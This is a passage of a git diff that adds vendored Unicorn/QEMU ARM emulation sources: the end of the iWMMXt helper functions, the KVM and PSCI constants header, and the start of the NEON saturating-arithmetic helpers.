env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | + NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | + NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | + NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); + return a; +} + +uint64_t HELPER(iwmmxt_packul)(CPUARMState *env, uint64_t a, uint64_t b) +{ + a = (((a >> 0) & 0xffff) << 0) | (((a >> 32) & 0xffff) << 16) | + (((b >> 0) & 0xffff) << 32) | (((b >> 32) & 0xffff) << 48); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(a >> 0, 0) | NZBIT16(a >> 16, 1) | + NZBIT16(a >> 32, 2) | NZBIT16(a >> 48, 3); + return a; +} + +uint64_t HELPER(iwmmxt_packuq)(CPUARMState *env, uint64_t a, uint64_t b) +{ + a = (a & 0xffffffff) | ((b & 0xffffffff) << 32); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); + return a; +} + +/* TODO: Signed-Saturation */ +uint64_t HELPER(iwmmxt_packsw)(CPUARMState *env, uint64_t a, uint64_t b) +{ + a = (((a >> 0) & 0xff) << 0) | (((a >> 16) & 0xff) << 8) | + (((a >> 32) & 0xff) << 16) | 
(((a >> 48) & 0xff) << 24) | + (((b >> 0) & 0xff) << 32) | (((b >> 16) & 0xff) << 40) | + (((b >> 32) & 0xff) << 48) | (((b >> 48) & 0xff) << 56); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | + NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | + NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | + NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); + return a; +} + +uint64_t HELPER(iwmmxt_packsl)(CPUARMState *env, uint64_t a, uint64_t b) +{ + a = (((a >> 0) & 0xffff) << 0) | (((a >> 32) & 0xffff) << 16) | + (((b >> 0) & 0xffff) << 32) | (((b >> 32) & 0xffff) << 48); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(a >> 0, 0) | NZBIT16(a >> 16, 1) | + NZBIT16(a >> 32, 2) | NZBIT16(a >> 48, 3); + return a; +} + +uint64_t HELPER(iwmmxt_packsq)(CPUARMState *env, uint64_t a, uint64_t b) +{ + a = (a & 0xffffffff) | ((b & 0xffffffff) << 32); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); + return a; +} + +uint64_t HELPER(iwmmxt_muladdsl)(uint64_t c, uint32_t a, uint32_t b) +{ + return c + ((int32_t) EXTEND32(a) * (int32_t) EXTEND32(b)); +} + +uint64_t HELPER(iwmmxt_muladdsw)(uint64_t c, uint32_t a, uint32_t b) +{ + c += EXTEND32(EXTEND16S((a >> 0) & 0xffff) * + EXTEND16S((b >> 0) & 0xffff)); + c += EXTEND32(EXTEND16S((a >> 16) & 0xffff) * + EXTEND16S((b >> 16) & 0xffff)); + return c; +} + +uint64_t HELPER(iwmmxt_muladdswl)(uint64_t c, uint32_t a, uint32_t b) +{ + return c + (EXTEND32(EXTEND16S(a & 0xffff) * + EXTEND16S(b & 0xffff))); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/kvm-consts.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/kvm-consts.h new file mode 100644 index 0000000..aea12f1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/kvm-consts.h @@ -0,0 +1,182 @@ +/* + * KVM ARM ABI constant definitions + * + * Copyright (c) 2013 Linaro Limited + * + * Provide versions of KVM constant defines that can be used even + * when CONFIG_KVM is not set and we don't 
have access to the + * KVM headers. If CONFIG_KVM is set, we do a compile-time check + * that we haven't got out of sync somehow. + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + */ +#ifndef ARM_KVM_CONSTS_H +#define ARM_KVM_CONSTS_H + +#ifdef CONFIG_KVM +#include "qemu/compiler.h" +#include +#include + +#define MISMATCH_CHECK(X, Y) QEMU_BUILD_BUG_ON(X != Y) + +#else +#define MISMATCH_CHECK(X, Y) +#endif + +#define CP_REG_SIZE_SHIFT 52 +#define CP_REG_SIZE_MASK 0x00f0000000000000ULL +#define CP_REG_SIZE_U32 0x0020000000000000ULL +#define CP_REG_SIZE_U64 0x0030000000000000ULL +#define CP_REG_ARM 0x4000000000000000ULL +#define CP_REG_ARCH_MASK 0xff00000000000000ULL + +MISMATCH_CHECK(CP_REG_SIZE_SHIFT, KVM_REG_SIZE_SHIFT) +MISMATCH_CHECK(CP_REG_SIZE_MASK, KVM_REG_SIZE_MASK) +MISMATCH_CHECK(CP_REG_SIZE_U32, KVM_REG_SIZE_U32) +MISMATCH_CHECK(CP_REG_SIZE_U64, KVM_REG_SIZE_U64) +MISMATCH_CHECK(CP_REG_ARM, KVM_REG_ARM) +MISMATCH_CHECK(CP_REG_ARCH_MASK, KVM_REG_ARCH_MASK) + +#define QEMU_PSCI_0_1_FN_BASE 0x95c1ba5e +#define QEMU_PSCI_0_1_FN(n) (QEMU_PSCI_0_1_FN_BASE + (n)) +#define QEMU_PSCI_0_1_FN_CPU_SUSPEND QEMU_PSCI_0_1_FN(0) +#define QEMU_PSCI_0_1_FN_CPU_OFF QEMU_PSCI_0_1_FN(1) +#define QEMU_PSCI_0_1_FN_CPU_ON QEMU_PSCI_0_1_FN(2) +#define QEMU_PSCI_0_1_FN_MIGRATE QEMU_PSCI_0_1_FN(3) + +MISMATCH_CHECK(QEMU_PSCI_0_1_FN_CPU_SUSPEND, KVM_PSCI_FN_CPU_SUSPEND) +MISMATCH_CHECK(QEMU_PSCI_0_1_FN_CPU_OFF, KVM_PSCI_FN_CPU_OFF) +MISMATCH_CHECK(QEMU_PSCI_0_1_FN_CPU_ON, KVM_PSCI_FN_CPU_ON) +MISMATCH_CHECK(QEMU_PSCI_0_1_FN_MIGRATE, KVM_PSCI_FN_MIGRATE) + +#define QEMU_PSCI_0_2_FN_BASE 0x84000000 +#define QEMU_PSCI_0_2_FN(n) (QEMU_PSCI_0_2_FN_BASE + (n)) + +#define QEMU_PSCI_0_2_64BIT 0x40000000 +#define QEMU_PSCI_0_2_FN64_BASE \ + (QEMU_PSCI_0_2_FN_BASE + QEMU_PSCI_0_2_64BIT) +#define QEMU_PSCI_0_2_FN64(n) (QEMU_PSCI_0_2_FN64_BASE + (n)) + +#define QEMU_PSCI_0_2_FN_PSCI_VERSION QEMU_PSCI_0_2_FN(0) 
+#define QEMU_PSCI_0_2_FN_CPU_SUSPEND QEMU_PSCI_0_2_FN(1) +#define QEMU_PSCI_0_2_FN_CPU_OFF QEMU_PSCI_0_2_FN(2) +#define QEMU_PSCI_0_2_FN_CPU_ON QEMU_PSCI_0_2_FN(3) +#define QEMU_PSCI_0_2_FN_AFFINITY_INFO QEMU_PSCI_0_2_FN(4) +#define QEMU_PSCI_0_2_FN_MIGRATE QEMU_PSCI_0_2_FN(5) +#define QEMU_PSCI_0_2_FN_MIGRATE_INFO_TYPE QEMU_PSCI_0_2_FN(6) +#define QEMU_PSCI_0_2_FN_MIGRATE_INFO_UP_CPU QEMU_PSCI_0_2_FN(7) +#define QEMU_PSCI_0_2_FN_SYSTEM_OFF QEMU_PSCI_0_2_FN(8) +#define QEMU_PSCI_0_2_FN_SYSTEM_RESET QEMU_PSCI_0_2_FN(9) + +#define QEMU_PSCI_0_2_FN64_CPU_SUSPEND QEMU_PSCI_0_2_FN64(1) +#define QEMU_PSCI_0_2_FN64_CPU_OFF QEMU_PSCI_0_2_FN64(2) +#define QEMU_PSCI_0_2_FN64_CPU_ON QEMU_PSCI_0_2_FN64(3) +#define QEMU_PSCI_0_2_FN64_AFFINITY_INFO QEMU_PSCI_0_2_FN64(4) +#define QEMU_PSCI_0_2_FN64_MIGRATE QEMU_PSCI_0_2_FN64(5) + +MISMATCH_CHECK(QEMU_PSCI_0_2_FN_CPU_SUSPEND, PSCI_0_2_FN_CPU_SUSPEND) +MISMATCH_CHECK(QEMU_PSCI_0_2_FN_CPU_OFF, PSCI_0_2_FN_CPU_OFF) +MISMATCH_CHECK(QEMU_PSCI_0_2_FN_CPU_ON, PSCI_0_2_FN_CPU_ON) +MISMATCH_CHECK(QEMU_PSCI_0_2_FN_MIGRATE, PSCI_0_2_FN_MIGRATE) +MISMATCH_CHECK(QEMU_PSCI_0_2_FN64_CPU_SUSPEND, PSCI_0_2_FN64_CPU_SUSPEND) +MISMATCH_CHECK(QEMU_PSCI_0_2_FN64_CPU_ON, PSCI_0_2_FN64_CPU_ON) +MISMATCH_CHECK(QEMU_PSCI_0_2_FN64_MIGRATE, PSCI_0_2_FN64_MIGRATE) + +/* PSCI v0.2 return values used by TCG emulation of PSCI */ + +/* No Trusted OS migration to worry about when offlining CPUs */ +#define QEMU_PSCI_0_2_RET_TOS_MIGRATION_NOT_REQUIRED 2 + +/* We implement version 0.2 only */ +#define QEMU_PSCI_0_2_RET_VERSION_0_2 2 + +MISMATCH_CHECK(QEMU_PSCI_0_2_RET_TOS_MIGRATION_NOT_REQUIRED, PSCI_0_2_TOS_MP) +MISMATCH_CHECK(QEMU_PSCI_0_2_RET_VERSION_0_2, + (PSCI_VERSION_MAJOR(0) | PSCI_VERSION_MINOR(2))) + +/* PSCI return values (inclusive of all PSCI versions) */ +#define QEMU_PSCI_RET_SUCCESS 0 +#define QEMU_PSCI_RET_NOT_SUPPORTED -1 +#define QEMU_PSCI_RET_INVALID_PARAMS -2 +#define QEMU_PSCI_RET_DENIED -3 +#define QEMU_PSCI_RET_ALREADY_ON -4 +#define 
QEMU_PSCI_RET_ON_PENDING -5 +#define QEMU_PSCI_RET_INTERNAL_FAILURE -6 +#define QEMU_PSCI_RET_NOT_PRESENT -7 +#define QEMU_PSCI_RET_DISABLED -8 + +MISMATCH_CHECK(QEMU_PSCI_RET_SUCCESS, PSCI_RET_SUCCESS) +MISMATCH_CHECK(QEMU_PSCI_RET_NOT_SUPPORTED, PSCI_RET_NOT_SUPPORTED) +MISMATCH_CHECK(QEMU_PSCI_RET_INVALID_PARAMS, PSCI_RET_INVALID_PARAMS) +MISMATCH_CHECK(QEMU_PSCI_RET_DENIED, PSCI_RET_DENIED) +MISMATCH_CHECK(QEMU_PSCI_RET_ALREADY_ON, PSCI_RET_ALREADY_ON) +MISMATCH_CHECK(QEMU_PSCI_RET_ON_PENDING, PSCI_RET_ON_PENDING) +MISMATCH_CHECK(QEMU_PSCI_RET_INTERNAL_FAILURE, PSCI_RET_INTERNAL_FAILURE) +MISMATCH_CHECK(QEMU_PSCI_RET_NOT_PRESENT, PSCI_RET_NOT_PRESENT) +MISMATCH_CHECK(QEMU_PSCI_RET_DISABLED, PSCI_RET_DISABLED) + +/* Note that KVM uses overlapping values for AArch32 and AArch64 + * target CPU numbers. AArch32 targets: + */ +#define QEMU_KVM_ARM_TARGET_CORTEX_A15 0 +#define QEMU_KVM_ARM_TARGET_CORTEX_A7 1 + +/* AArch64 targets: */ +#define QEMU_KVM_ARM_TARGET_AEM_V8 0 +#define QEMU_KVM_ARM_TARGET_FOUNDATION_V8 1 +#define QEMU_KVM_ARM_TARGET_CORTEX_A57 2 + +/* There's no kernel define for this: sentinel value which + * matches no KVM target value for either 64 or 32 bit + */ +#define QEMU_KVM_ARM_TARGET_NONE UINT_MAX + +#ifdef TARGET_AARCH64 +MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_AEM_V8, KVM_ARM_TARGET_AEM_V8) +MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_FOUNDATION_V8, KVM_ARM_TARGET_FOUNDATION_V8) +MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A57, KVM_ARM_TARGET_CORTEX_A57) +#else +MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A15, KVM_ARM_TARGET_CORTEX_A15) +MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A7, KVM_ARM_TARGET_CORTEX_A7) +#endif + +#define CP_REG_ARM64 0x6000000000000000ULL +#define CP_REG_ARM_COPROC_MASK 0x000000000FFF0000 +#define CP_REG_ARM_COPROC_SHIFT 16 +#define CP_REG_ARM64_SYSREG (0x0013 << CP_REG_ARM_COPROC_SHIFT) +#define CP_REG_ARM64_SYSREG_OP0_MASK 0x000000000000c000 +#define CP_REG_ARM64_SYSREG_OP0_SHIFT 14 +#define CP_REG_ARM64_SYSREG_OP1_MASK 
0x0000000000003800 +#define CP_REG_ARM64_SYSREG_OP1_SHIFT 11 +#define CP_REG_ARM64_SYSREG_CRN_MASK 0x0000000000000780 +#define CP_REG_ARM64_SYSREG_CRN_SHIFT 7 +#define CP_REG_ARM64_SYSREG_CRM_MASK 0x0000000000000078 +#define CP_REG_ARM64_SYSREG_CRM_SHIFT 3 +#define CP_REG_ARM64_SYSREG_OP2_MASK 0x0000000000000007 +#define CP_REG_ARM64_SYSREG_OP2_SHIFT 0 + +/* No kernel define but it's useful to QEMU */ +#define CP_REG_ARM64_SYSREG_CP (CP_REG_ARM64_SYSREG >> CP_REG_ARM_COPROC_SHIFT) + +#ifdef TARGET_AARCH64 +MISMATCH_CHECK(CP_REG_ARM64, KVM_REG_ARM64) +MISMATCH_CHECK(CP_REG_ARM_COPROC_MASK, KVM_REG_ARM_COPROC_MASK) +MISMATCH_CHECK(CP_REG_ARM_COPROC_SHIFT, KVM_REG_ARM_COPROC_SHIFT) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG, KVM_REG_ARM64_SYSREG) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP0_MASK, KVM_REG_ARM64_SYSREG_OP0_MASK) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP0_SHIFT, KVM_REG_ARM64_SYSREG_OP0_SHIFT) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP1_MASK, KVM_REG_ARM64_SYSREG_OP1_MASK) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP1_SHIFT, KVM_REG_ARM64_SYSREG_OP1_SHIFT) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRN_MASK, KVM_REG_ARM64_SYSREG_CRN_MASK) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRN_SHIFT, KVM_REG_ARM64_SYSREG_CRN_SHIFT) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRM_MASK, KVM_REG_ARM64_SYSREG_CRM_MASK) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRM_SHIFT, KVM_REG_ARM64_SYSREG_CRM_SHIFT) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP2_MASK, KVM_REG_ARM64_SYSREG_OP2_MASK) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP2_SHIFT, KVM_REG_ARM64_SYSREG_OP2_SHIFT) +#endif + +#undef MISMATCH_CHECK + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/neon_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/neon_helper.c new file mode 100644 index 0000000..fdae9d4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/neon_helper.c @@ -0,0 +1,2243 @@ +/* + * ARM NEON vector operations. + * + * Copyright (c) 2007, 2008 CodeSourcery. 
+ * Written by Paul Brook + * + * This code is licensed under the GNU GPL v2. + */ +#include +#include + +#include "cpu.h" +#include "exec/exec-all.h" +#include "exec/helper-proto.h" + +#define SIGNBIT (uint32_t)0x80000000 +#define SIGNBIT64 ((uint64_t)1 << 63) + +#define SET_QC() env->vfp.xregs[ARM_VFP_FPSCR] |= CPSR_Q + +#define NEON_TYPE1(name, type) \ +typedef struct \ +{ \ + type v1; \ +} neon_##name; +#ifdef HOST_WORDS_BIGENDIAN +#define NEON_TYPE2(name, type) \ +typedef struct \ +{ \ + type v2; \ + type v1; \ +} neon_##name; +#define NEON_TYPE4(name, type) \ +typedef struct \ +{ \ + type v4; \ + type v3; \ + type v2; \ + type v1; \ +} neon_##name; +#else +#define NEON_TYPE2(name, type) \ +typedef struct \ +{ \ + type v1; \ + type v2; \ +} neon_##name; +#define NEON_TYPE4(name, type) \ +typedef struct \ +{ \ + type v1; \ + type v2; \ + type v3; \ + type v4; \ +} neon_##name; +#endif + +NEON_TYPE4(s8, int8_t) +NEON_TYPE4(u8, uint8_t) +NEON_TYPE2(s16, int16_t) +NEON_TYPE2(u16, uint16_t) +NEON_TYPE1(s32, int32_t) +NEON_TYPE1(u32, uint32_t) +#undef NEON_TYPE4 +#undef NEON_TYPE2 +#undef NEON_TYPE1 + +/* Copy from a uint32_t to a vector structure type. */ +#define NEON_UNPACK(vtype, dest, val) do { \ + union { \ + vtype v; \ + uint32_t i; \ + } conv_u; \ + conv_u.i = (val); \ + dest = conv_u.v; \ + } while(0) + +/* Copy from a vector structure type to a uint32_t. 
*/ +#define NEON_PACK(vtype, dest, val) do { \ + union { \ + vtype v; \ + uint32_t i; \ + } conv_u; \ + conv_u.v = (val); \ + dest = conv_u.i; \ + } while(0) + +#define NEON_DO1 \ + NEON_FN(vdest.v1, vsrc1.v1, vsrc2.v1); +#define NEON_DO2 \ + NEON_FN(vdest.v1, vsrc1.v1, vsrc2.v1); \ + NEON_FN(vdest.v2, vsrc1.v2, vsrc2.v2); +#define NEON_DO4 \ + NEON_FN(vdest.v1, vsrc1.v1, vsrc2.v1); \ + NEON_FN(vdest.v2, vsrc1.v2, vsrc2.v2); \ + NEON_FN(vdest.v3, vsrc1.v3, vsrc2.v3); \ + NEON_FN(vdest.v4, vsrc1.v4, vsrc2.v4); + +#define NEON_VOP_BODY(vtype, n) \ +{ \ + uint32_t res; \ + vtype vsrc1; \ + vtype vsrc2; \ + vtype vdest; \ + NEON_UNPACK(vtype, vsrc1, arg1); \ + NEON_UNPACK(vtype, vsrc2, arg2); \ + NEON_DO##n; \ + NEON_PACK(vtype, res, vdest); \ + return res; \ +} + +#define NEON_VOP(name, vtype, n) \ +uint32_t HELPER(glue(neon_,name))(uint32_t arg1, uint32_t arg2) \ +NEON_VOP_BODY(vtype, n) + +#define NEON_VOP_ENV(name, vtype, n) \ +uint32_t HELPER(glue(neon_,name))(CPUARMState *env, uint32_t arg1, uint32_t arg2) \ +NEON_VOP_BODY(vtype, n) + +/* Pairwise operations. */ +/* For 32-bit elements each segment only contains a single element, so + the elementwise and pairwise operations are the same. */ +#define NEON_PDO2 \ + NEON_FN(vdest.v1, vsrc1.v1, vsrc1.v2); \ + NEON_FN(vdest.v2, vsrc2.v1, vsrc2.v2); +#define NEON_PDO4 \ + NEON_FN(vdest.v1, vsrc1.v1, vsrc1.v2); \ + NEON_FN(vdest.v2, vsrc1.v3, vsrc1.v4); \ + NEON_FN(vdest.v3, vsrc2.v1, vsrc2.v2); \ + NEON_FN(vdest.v4, vsrc2.v3, vsrc2.v4); \ + +#define NEON_POP(name, vtype, n) \ +uint32_t HELPER(glue(neon_,name))(uint32_t arg1, uint32_t arg2) \ +{ \ + uint32_t res; \ + vtype vsrc1; \ + vtype vsrc2; \ + vtype vdest; \ + NEON_UNPACK(vtype, vsrc1, arg1); \ + NEON_UNPACK(vtype, vsrc2, arg2); \ + NEON_PDO##n; \ + NEON_PACK(vtype, res, vdest); \ + return res; \ +} + +/* Unary operators. 
*/ +#define NEON_VOP1(name, vtype, n) \ +uint32_t HELPER(glue(neon_,name))(uint32_t arg) \ +{ \ + vtype vsrc1; \ + vtype vdest; \ + NEON_UNPACK(vtype, vsrc1, arg); \ + NEON_DO##n; \ + NEON_PACK(vtype, arg, vdest); \ + return arg; \ +} + + +#define NEON_USAT(dest, src1, src2, type) do { \ + uint32_t tmp = (uint32_t)src1 + (uint32_t)src2; \ + if (tmp != (type)tmp) { \ + SET_QC(); \ + dest = ~0; \ + } else { \ + dest = tmp; \ + }} while(0) +#define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint8_t) +NEON_VOP_ENV(qadd_u8, neon_u8, 4) +#undef NEON_FN +#define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint16_t) +NEON_VOP_ENV(qadd_u16, neon_u16, 2) +#undef NEON_FN +#undef NEON_USAT + +uint32_t HELPER(neon_qadd_u32)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a + b; + if (res < a) { + SET_QC(); + res = ~0; + } + return res; +} + +uint64_t HELPER(neon_qadd_u64)(CPUARMState *env, uint64_t src1, uint64_t src2) +{ + uint64_t res; + + res = src1 + src2; + if (res < src1) { + SET_QC(); + res = ~(uint64_t)0; + } + return res; +} + +#define NEON_SSAT(dest, src1, src2, type) do { \ + int32_t tmp = (uint32_t)src1 + (uint32_t)src2; \ + if (tmp != (type)tmp) { \ + SET_QC(); \ + if (src2 > 0) { \ + tmp = (1 << (sizeof(type) * 8 - 1)) - 1; \ + } else { \ + tmp = 1 << (sizeof(type) * 8 - 1); \ + } \ + } \ + dest = tmp; \ + } while(0) +#define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int8_t) +NEON_VOP_ENV(qadd_s8, neon_s8, 4) +#undef NEON_FN +#define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int16_t) +NEON_VOP_ENV(qadd_s16, neon_s16, 2) +#undef NEON_FN +#undef NEON_SSAT + +uint32_t HELPER(neon_qadd_s32)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a + b; + if (((res ^ a) & SIGNBIT) && !((a ^ b) & SIGNBIT)) { + SET_QC(); + res = ~(((int32_t)a >> 31) ^ SIGNBIT); + } + return res; +} + +uint64_t HELPER(neon_qadd_s64)(CPUARMState *env, uint64_t src1, uint64_t src2) +{ + uint64_t res; + + res = src1 + src2; + 
if (((res ^ src1) & SIGNBIT64) && !((src1 ^ src2) & SIGNBIT64)) { + SET_QC(); + res = ((int64_t)src1 >> 63) ^ ~SIGNBIT64; + } + return res; +} + +/* Unsigned saturating accumulate of signed value + * + * Op1/Rn is treated as signed + * Op2/Rd is treated as unsigned + * + * Explicit casting is used to ensure the correct sign extension of + * inputs. The result is treated as a unsigned value and saturated as such. + * + * We use a macro for the 8/16 bit cases which expects signed integers of va, + * vb, and vr for interim calculation and an unsigned 32 bit result value r. + */ + +#define USATACC(bits, shift) \ + do { \ + va = sextract32(a, shift, bits); \ + vb = extract32(b, shift, bits); \ + vr = va + vb; \ + if (vr > UINT##bits##_MAX) { \ + SET_QC(); \ + vr = UINT##bits##_MAX; \ + } else if (vr < 0) { \ + SET_QC(); \ + vr = 0; \ + } \ + r = deposit32(r, shift, bits, vr); \ + } while (0) + +uint32_t HELPER(neon_uqadd_s8)(CPUARMState *env, uint32_t a, uint32_t b) +{ + int16_t va, vb, vr; + uint32_t r = 0; + + USATACC(8, 0); + USATACC(8, 8); + USATACC(8, 16); + USATACC(8, 24); + return r; +} + +uint32_t HELPER(neon_uqadd_s16)(CPUARMState *env, uint32_t a, uint32_t b) +{ + int32_t va, vb, vr; + uint64_t r = 0; + + USATACC(16, 0); + USATACC(16, 16); + return r; +} + +#undef USATACC + +uint32_t HELPER(neon_uqadd_s32)(CPUARMState *env, uint32_t a, uint32_t b) +{ + int64_t va = (int32_t)a; + int64_t vb = (uint32_t)b; + int64_t vr = va + vb; + if (vr > UINT32_MAX) { + SET_QC(); + vr = UINT32_MAX; + } else if (vr < 0) { + SET_QC(); + vr = 0; + } + return vr; +} + +uint64_t HELPER(neon_uqadd_s64)(CPUARMState *env, uint64_t a, uint64_t b) +{ + uint64_t res; + res = a + b; + /* We only need to look at the pattern of SIGN bits to detect + * +ve/-ve saturation + */ + if (~a & b & ~res & SIGNBIT64) { + SET_QC(); + res = UINT64_MAX; + } else if (a & ~b & res & SIGNBIT64) { + SET_QC(); + res = 0; + } + return res; +} + +/* Signed saturating accumulate of unsigned value + * + * 
Op1/Rn is treated as unsigned + * Op2/Rd is treated as signed + * + * The result is treated as a signed value and saturated as such + * + * We use a macro for the 8/16 bit cases which expects signed integers of va, + * vb, and vr for interim calculation and an unsigned 32 bit result value r. + */ + +#define SSATACC(bits, shift) \ + do { \ + va = extract32(a, shift, bits); \ + vb = sextract32(b, shift, bits); \ + vr = va + vb; \ + if (vr > INT##bits##_MAX) { \ + SET_QC(); \ + vr = INT##bits##_MAX; \ + } else if (vr < INT##bits##_MIN) { \ + SET_QC(); \ + vr = INT##bits##_MIN; \ + } \ + r = deposit32(r, shift, bits, vr); \ + } while (0) + +uint32_t HELPER(neon_sqadd_u8)(CPUARMState *env, uint32_t a, uint32_t b) +{ + int16_t va, vb, vr; + uint32_t r = 0; + + SSATACC(8, 0); + SSATACC(8, 8); + SSATACC(8, 16); + SSATACC(8, 24); + return r; +} + +uint32_t HELPER(neon_sqadd_u16)(CPUARMState *env, uint32_t a, uint32_t b) +{ + int32_t va, vb, vr; + uint32_t r = 0; + + SSATACC(16, 0); + SSATACC(16, 16); + + return r; +} + +#undef SSATACC + +uint32_t HELPER(neon_sqadd_u32)(CPUARMState *env, uint32_t a, uint32_t b) +{ + int64_t res; + int64_t op1 = (uint32_t)a; + int64_t op2 = (int32_t)b; + res = op1 + op2; + if (res > INT32_MAX) { + SET_QC(); + res = INT32_MAX; + } else if (res < INT32_MIN) { + SET_QC(); + res = INT32_MIN; + } + return res; +} + +uint64_t HELPER(neon_sqadd_u64)(CPUARMState *env, uint64_t a, uint64_t b) +{ + uint64_t res; + res = a + b; + /* We only need to look at the pattern of SIGN bits to detect an overflow */ + if (((a & res) + | (~b & res) + | (a & ~b)) & SIGNBIT64) { + SET_QC(); + res = INT64_MAX; + } + return res; +} + + +#define NEON_USAT(dest, src1, src2, type) do { \ + uint32_t tmp = (uint32_t)src1 - (uint32_t)src2; \ + if (tmp != (type)tmp) { \ + SET_QC(); \ + dest = 0; \ + } else { \ + dest = tmp; \ + }} while(0) +#define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint8_t) +NEON_VOP_ENV(qsub_u8, neon_u8, 4) +#undef NEON_FN +#define 
NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint16_t) +NEON_VOP_ENV(qsub_u16, neon_u16, 2) +#undef NEON_FN +#undef NEON_USAT + +uint32_t HELPER(neon_qsub_u32)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a - b; + if (res > a) { + SET_QC(); + res = 0; + } + return res; +} + +uint64_t HELPER(neon_qsub_u64)(CPUARMState *env, uint64_t src1, uint64_t src2) +{ + uint64_t res; + + if (src1 < src2) { + SET_QC(); + res = 0; + } else { + res = src1 - src2; + } + return res; +} + +#define NEON_SSAT(dest, src1, src2, type) do { \ + int32_t tmp = (uint32_t)src1 - (uint32_t)src2; \ + if (tmp != (type)tmp) { \ + SET_QC(); \ + if (src2 < 0) { \ + tmp = (1 << (sizeof(type) * 8 - 1)) - 1; \ + } else { \ + tmp = 1 << (sizeof(type) * 8 - 1); \ + } \ + } \ + dest = tmp; \ + } while(0) +#define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int8_t) +NEON_VOP_ENV(qsub_s8, neon_s8, 4) +#undef NEON_FN +#define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int16_t) +NEON_VOP_ENV(qsub_s16, neon_s16, 2) +#undef NEON_FN +#undef NEON_SSAT + +uint32_t HELPER(neon_qsub_s32)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a - b; + if (((res ^ a) & SIGNBIT) && ((a ^ b) & SIGNBIT)) { + SET_QC(); + res = ~(((int32_t)a >> 31) ^ SIGNBIT); + } + return res; +} + +uint64_t HELPER(neon_qsub_s64)(CPUARMState *env, uint64_t src1, uint64_t src2) +{ + uint64_t res; + + res = src1 - src2; + if (((res ^ src1) & SIGNBIT64) && ((src1 ^ src2) & SIGNBIT64)) { + SET_QC(); + res = ((int64_t)src1 >> 63) ^ ~SIGNBIT64; + } + return res; +} + +#define NEON_FN(dest, src1, src2) dest = (src1 + src2) >> 1 +NEON_VOP(hadd_s8, neon_s8, 4) +NEON_VOP(hadd_u8, neon_u8, 4) +NEON_VOP(hadd_s16, neon_s16, 2) +NEON_VOP(hadd_u16, neon_u16, 2) +#undef NEON_FN + +int32_t HELPER(neon_hadd_s32)(int32_t src1, int32_t src2) +{ + int32_t dest; + + dest = (src1 >> 1) + (src2 >> 1); + if (src1 & src2 & 1) + dest++; + return dest; +} + +uint32_t HELPER(neon_hadd_u32)(uint32_t src1, uint32_t 
src2) +{ + uint32_t dest; + + dest = (src1 >> 1) + (src2 >> 1); + if (src1 & src2 & 1) + dest++; + return dest; +} + +#define NEON_FN(dest, src1, src2) dest = (src1 + src2 + 1) >> 1 +NEON_VOP(rhadd_s8, neon_s8, 4) +NEON_VOP(rhadd_u8, neon_u8, 4) +NEON_VOP(rhadd_s16, neon_s16, 2) +NEON_VOP(rhadd_u16, neon_u16, 2) +#undef NEON_FN + +int32_t HELPER(neon_rhadd_s32)(int32_t src1, int32_t src2) +{ + int32_t dest; + + dest = (src1 >> 1) + (src2 >> 1); + if ((src1 | src2) & 1) + dest++; + return dest; +} + +uint32_t HELPER(neon_rhadd_u32)(uint32_t src1, uint32_t src2) +{ + uint32_t dest; + + dest = (src1 >> 1) + (src2 >> 1); + if ((src1 | src2) & 1) + dest++; + return dest; +} + +#define NEON_FN(dest, src1, src2) dest = (src1 - src2) >> 1 +NEON_VOP(hsub_s8, neon_s8, 4) +NEON_VOP(hsub_u8, neon_u8, 